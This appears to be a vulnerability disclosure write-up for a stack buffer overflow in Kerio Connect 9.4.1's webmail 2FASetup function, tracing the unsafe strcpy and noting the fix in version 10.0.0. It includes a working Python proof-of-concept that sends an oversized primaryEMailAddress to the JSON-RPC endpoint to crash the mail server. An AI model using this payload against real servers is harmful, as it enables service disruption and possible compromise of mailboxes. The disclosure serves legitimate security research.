kerioconnectPoC.md

Kerio Connect - Stack Buffer Overflow in 2FASetup

Introduction

The latest version 9.4.1 patch 1 (6445) of the software Kerio Connect is prone to a Stack Buffer Overflow located in the webmail component 2FASetup function. This attack could be conducted by any unprivileged authenticated webmail user.

Details

The function bool kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::doSubmitDomainUserTwoFA(basic_string *param_1,basic_string,*param_2,basic_string *param_3,basic_string *param_4,ulong param_5,int *param_6,short *param_7,short,*param_8,bool param_9,basic_string *param_10) makes use of an unsafe strcpy(dest,src) call with user-controlled input.

The destination buffer is defined with a fixed size char local_1c3 [128] and gets filled with the user-controlled param_4 buffer as source. Tracing back the input goes to the function kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::submitTwoFA (basic_string *param_1,basic_string *param_2,basic_string *param_3,int *param_4,short *param_5,basic_string *param_6,int *param_7) with param_3. The same parameter name comes from the caller kerio::mailserver::facades::webmail::SessionManFacade::submitUserTwoFA(SessionManFacade *this,TwoFAAuthenticationStatus *param_1,short *param_2,basic_string *param_3,basic_string *param_4,basic_string *param_5).

The code is called by triggering the 2FASetup in the webmail application running on TCP port 80 as normal user, i.e. no administrative permissions are needed. The 2FASetup is seen commonly enabled to further secure the login procedure against threat actors trying to get access to a mailbox if credentials were leaked.

When the user starts the 2FASetup

a request to the server with the parameters token and primaryEMailAddress is sent.

This request gets processed by the vulnerable code path mentioned above.

Proof-of-concept Exploitation

To prove that the vulnerable strcpy indeed is filled by user-controlled data from these parameters, a proof-of-concept exploit in Python script was written.

import requests
import sys

if(len(sys.argv) < 3):
	print("usage: python poc.py <SESSION_CONNECT_WEBMAIL> <TOKEN_CONNECT_WEBMAIL>(=<X-Token>)")
	sys.exit()

session = requests.session()

burp0_url = "http://localhost:80/webmail/api/jsonrpc/"
burp0_cookies = {"SESSION_CONNECT_WEBMAIL": sys.argv[1], "TOKEN_CONNECT_WEBMAIL": sys.argv[2]}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0", "Accept": "application/json-rpc", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Token": sys.argv[2], "X-Requested-With": "XMLHttpRequest", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/webmail/", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
nicestring = '\xb2\x5f\xa3\x02' #02a35fb2
shell = "A"*383 + nicestring + "B"*100
payload = '{\"id\": 16, \"jsonrpc\": \"2.0\", \"method\": \"Session.submitUserTwoFA\", \"params\": {\"primaryEMailAddress\": ' + '\"' +  shell + '\"' + ', "token": "123456"}}'
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=payload)
print("Payload send...")

The GNU debugger gdb (with gef extension) is used to debug the running binary /opt/kerio/mailserver/mailserver /opt/kerio/mailserver. A breakpoint at the vulnerable strcpy call is made at 0x0130f947.

Then the Python script with the cookie values fed into the parameters is called poc_sent.py 662a37f6e6fd2ed91307b8ce13998111ccf3a1b653b0cf58b22eaab8967f1103 a1d4229ded44eb257a58a4a99b3437ee0f1a19a563828c8ab9158ae0112b88db.

The breakpoint indeed is hit.

Due to the stack buffer overflow overwriting several other stack variables, the mailserver binary crashes and is (or has to be) restarted.

Patch

Version 10.0.0 fixed this issue properly.